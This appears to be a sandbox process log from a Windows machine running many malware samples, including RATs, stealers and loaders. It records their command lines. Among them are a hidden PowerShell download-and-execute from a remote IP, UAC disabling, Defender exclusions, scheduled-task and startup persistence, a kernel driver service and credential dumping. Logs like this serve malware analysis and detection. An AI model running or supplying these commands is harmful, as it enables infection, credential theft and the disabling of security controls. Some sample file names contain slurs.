"C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
"C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
"C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
C:\Users\Admin\AppData\Local\Temp\goofy.exe
"C:\Users\Admin\AppData\Local\Temp\goofy.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
"C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
C:\Users\Admin\AppData\Local\Temp\nigga.exe
"C:\Users\Admin\AppData\Local\Temp\nigga.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d8 0x464
C:\Users\Admin\AppData\Local\Temp\amadey.exe
"C:\Users\Admin\AppData\Local\Temp\amadey.exe"
C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
"C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
"C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
"C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
"C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
"C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
"C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
"C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
"C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1900 -ip 1900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5764 -ip 5764
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
"C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
"C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
"C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
"C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 960
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
"C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 224
C:\Users\Admin\AppData\Local\Temp\malware.exe
"C:\Users\Admin\AppData\Local\Temp\malware.exe"
C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
"C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4584 -ip 4584
C:\Users\Admin\AppData\Local\Temp\NetWire.exe
"C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1036 -ip 1036
C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
"C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
C:\Users\Admin\AppData\Local\Temp\Remcos.exe
"C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 152
C:\Windows\SysWOW64\sysaeiu.exe
C:\Windows\SysWOW64\sysaeiu.exe
C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
"C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Users\Admin\AppData\Local\Temp\NetWire.exe
"C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn PeJofmaR3uC /tr "mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta
C:\ProgramData\a5410c88f1\bween.exe
"C:\ProgramData\a5410c88f1\bween.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
"C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
"C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
"C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4584 -ip 4584
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
"C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8ACB.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 140
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3400 -ip 3400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4584 -ip 4584
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\setup-26030252553.exe
C:\Users\Admin\AppData\Local\Temp\\setup-26030252553.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 152
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn PeJofmaR3uC /tr "mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@4584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4584 -ip 4584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 504
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\SysWOW64\PING.EXE
PING 127.0.0.1 -n 2
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tfjlc9giuyED.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe
"C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe"
C:\Users\Admin\AppData\Local\TempJFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE
"C:\Users\Admin\AppData\Local\TempJFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE"
C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe
"C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe"
C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe
"C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe"
C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7188 -ip 7188
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa91b8dcf8,0x7ffa91b8dd04,0x7ffa91b8dd10
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 800
C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe"
C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe
"C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe"
C:\Users\Admin\AppData\Local\Temp\a\system.exe
"C:\Users\Admin\AppData\Local\Temp\a\system.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"' & exit
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'dJ3H492fymd.exe-1570' -RunLevel Highest "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1768,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2552 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2468,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2464 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2092,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2624 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4256 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4724 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
"C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
"C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe'
C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\system.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Users\Admin\AppData\Local\Temp\a\setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
"C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
"C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Users\Admin\AppData\Local\Temp\a\loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\loader.exe"
C:\Windows\SysWOW64\Userdata\Userdata.exe
"C:\Windows\SysWOW64\Userdata\Userdata.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F1C2.tmp\F1C3.tmp\F1C4.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
C:\Users\Admin\AppData\Local\Temp\a\01.exe
"C:\Users\Admin\AppData\Local\Temp\a\01.exe"
C:\Windows\system32\taskkill.exe
"taskkill" /f /im pcidrv.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
C:\ProgramData\wxjurcj\qums.exe
C:\ProgramData\wxjurcj\qums.exe start2
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\busdrv.exe /sc onstart /ru SYSTEM /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vHrygAPe57m.bat" "
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A74CB712F95DF8901AAD93FCD698C2FE C
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe" go
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
"C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13B2.tmp\13B3.tmp\13B4.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1697420900235384164176743894 -oextracted
C:\Users\Admin\Drivers\busdrv.exe
"C:\Users\Admin\Drivers\busdrv.exe"
C:\Windows\system32\cmd.exe
"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\a\01.exe
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:'
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\Temp\a\ori.exe
"C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe
"C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\MnCPLj3GUe7a.exe /sc minute /mo 1 /f
C:\Users\Admin\AppData\Local\Temp\a\x.exe
"C:\Users\Admin\AppData\Local\Temp\a\x.exe"
C:\Users\Admin\AppData\Local\Temp\a\we.exe
"C:\Users\Admin\AppData\Local\Temp\a\we.exe"
C:\Users\Admin\AppData\Local\Temp\a\rem.exe
"C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
C:\Users\Admin\AppData\Local\Temp\a\apple.exe
"C:\Users\Admin\AppData\Local\Temp\a\apple.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CA4.tmp.bat""
C:\Windows\system32\sc.exe
sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe
"C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10337540121\am_no.cmd" "
C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
C:\Windows\TEMP\{2DF2633F-CAF2-430C-97E9-BD50B98E0239}\.cr\xmsn.exe
